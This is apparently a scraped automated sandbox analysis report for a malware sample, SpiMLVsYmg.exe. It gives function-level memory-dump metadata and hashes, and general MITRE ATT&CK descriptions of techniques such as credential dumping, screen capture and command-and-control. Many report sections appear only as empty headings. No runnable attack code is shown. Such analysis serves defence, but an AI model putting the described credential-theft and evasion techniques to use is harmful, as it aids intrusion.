Function 00D9049B, Relevance: 7.7, APIs: 5, Instructions: 193COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D90562
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D90585

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 23cd54c5ead6a630d25a87274ab4d4de8134c5e9f9243e0fd3d26389010b8487
Instruction ID: 15e286aab01b3f210905bafc873f1b7e37a1f3d6912efaa88e777e87021ac2f9
Opcode Fuzzy Hash: 23cd54c5ead6a630d25a87274ab4d4de8134c5e9f9243e0fd3d26389010b8487
Instruction Fuzzy Hash: 24712CB1A00609EFCB14DFAAD5806EEBBF6FF88300F14856DE55AD7250DB709A01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00DAC359, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00DAC371

Part of subcall function 00DA6035: RtlFreeHeap.NTDLL(00000000,00000000,?,00DA2E0C,00D2254A,?), ref: 00DA604B
Part of subcall function 00DA6035: GetLastError.KERNEL32(?,?,00DA2E0C,00D2254A,?), ref: 00DA605D

_free.LIBCMT ref: 00DAC383
_free.LIBCMT ref: 00DAC395
_free.LIBCMT ref: 00DAC3A7
_free.LIBCMT ref: 00DAC3B9

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 84e05fe459f30525a35ff588c2d667e4f6100b21da1b2bd19d2fb0d8469d3042
Instruction ID: 30b811a7cb1eef1f99de73269529269d62e1e3822854a1d700dc4645a89996f4
Opcode Fuzzy Hash: 84e05fe459f30525a35ff588c2d667e4f6100b21da1b2bd19d2fb0d8469d3042
Instruction Fuzzy Hash: E3F0627351A301ABCA35EB68E889C1A73E9EB4676075C5C06F004D7610C734FCC14A74

Uniqueness

Uniqueness Score: -1.00%

Function 00DA4787, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\SpiMLVsYmg.exe, xrefs: 00DA47C5, 00DA47CC, 00DA4800

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Users\user\Desktop\SpiMLVsYmg.exe
API String ID: 0-3096943497
Opcode ID: 0ededfa42ccb5d0852c1c8b31ae7a85a3c4fa21159f023f79564c2e4fffc01de
Instruction ID: 4ac842b915fa7d2461865328e3efa845c0403a67e0b2c22bd4da8f3ba0109026
Opcode Fuzzy Hash: 0ededfa42ccb5d0852c1c8b31ae7a85a3c4fa21159f023f79564c2e4fffc01de
Instruction Fuzzy Hash: 5F31A071E00254AFDB21DFA9EC859AEBBF8EBC6710B150067E800D7251D7B58E41CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D3C77B, Relevance: 6.1, APIs: 4, Instructions: 105COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00D3C7A8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D3C7CA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D3C7FA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D3C84D

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__aulldiv
String ID:
API String ID: 3650730422-0
Opcode ID: 4393b81b59b428ba58589b56a47aed4bdb4e94f9a06329f8ad8c486ea05446f3
Instruction ID: 435a123175e078bd4966e10c0f22a6091ea2f2503183f1e87fb5ce81a403e819
Opcode Fuzzy Hash: 4393b81b59b428ba58589b56a47aed4bdb4e94f9a06329f8ad8c486ea05446f3
Instruction Fuzzy Hash: 21312676630625BADF345B6E8C80AEE36D4EF44794F18B13AF916F2250F6708E408B71

Uniqueness

Uniqueness Score: -1.00%

Function 00DA6749, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00DA3CF5,00DA3CF5,900C408B,00DAE37F,00000001,00DA3CF5,00000020,?,00DAE839,00DA3CF5,00000000,00DA3CF5,00DA3CF5,00000010,00DA8BAC,00000000), ref: 00DA674E
_free.LIBCMT ref: 00DA67AB
_free.LIBCMT ref: 00DA67E1
SetLastError.KERNEL32(00000000,00000006,000000FF,?,00DAE839,00DA3CF5,00000000,00DA3CF5,00DA3CF5,00000010,00DA8BAC,00000000,8304488B,00000000,00000000,00000020), ref: 00DA67EC

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 1b971ec73e94f1fd589b6c4a3fa5efd503d7cf0f24269b0ffac914d4094b709b
Instruction ID: e761e6acef0742678af12799d8d3a9c700795da8d95af814e52797cef68b4da2
Opcode Fuzzy Hash: 1b971ec73e94f1fd589b6c4a3fa5efd503d7cf0f24269b0ffac914d4094b709b
Instruction Fuzzy Hash: BD11C672305601EA9B112778ACC5D2B266DDBC37B973C0625F210C62D1EE69CC055530

Uniqueness

Uniqueness Score: -1.00%

Function 00DA68A0, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00000000,00DA632B,00DA605B,?,?,00DA2E0C,00D2254A,?), ref: 00DA68A5
_free.LIBCMT ref: 00DA6902
_free.LIBCMT ref: 00DA6938
SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,00DA632B,00DA605B,?,?,00DA2E0C,00D2254A,?), ref: 00DA6943

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 33d1e85cc1dfb9e8a1c85fc4d3b9be22ea7f000d37e2358093fe806c97144de5
Instruction ID: 18928cc5a9d68096ff91952d9acd0c16cdd4489ed323c7f9bcea690fc31a6c63
Opcode Fuzzy Hash: 33d1e85cc1dfb9e8a1c85fc4d3b9be22ea7f000d37e2358093fe806c97144de5
Instruction Fuzzy Hash: 99118872305701EADB112779AC8AE2B266DDBC37B973D0636F214D62E1ED79CC055530

Uniqueness

Uniqueness Score: -1.00%

Function 00D64830, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00D648C3

Strings

%llu, xrefs: 00D648CA
%llu, xrefs: 00D6487F

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldiv
String ID: %llu$%llu
API String ID: 3732870572-4283164361
Opcode ID: abc238360810ae8e7ca79e17f3fb1bbabd0e0ed9b1f6e206117d4fde8a58924c
Instruction ID: 1eff996740202dec706d3d371b1b06114363cda978faebd54f92e3fe034c8520
Opcode Fuzzy Hash: abc238360810ae8e7ca79e17f3fb1bbabd0e0ed9b1f6e206117d4fde8a58924c
Instruction Fuzzy Hash: BB21D3726003406BC620AA28DC42F7B73A9EBC1720F08472DF952976D1DB20ED08C7B2

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report SpiMLVsYmg.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Malware Analysis System Evasion:

Anti Debugging:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back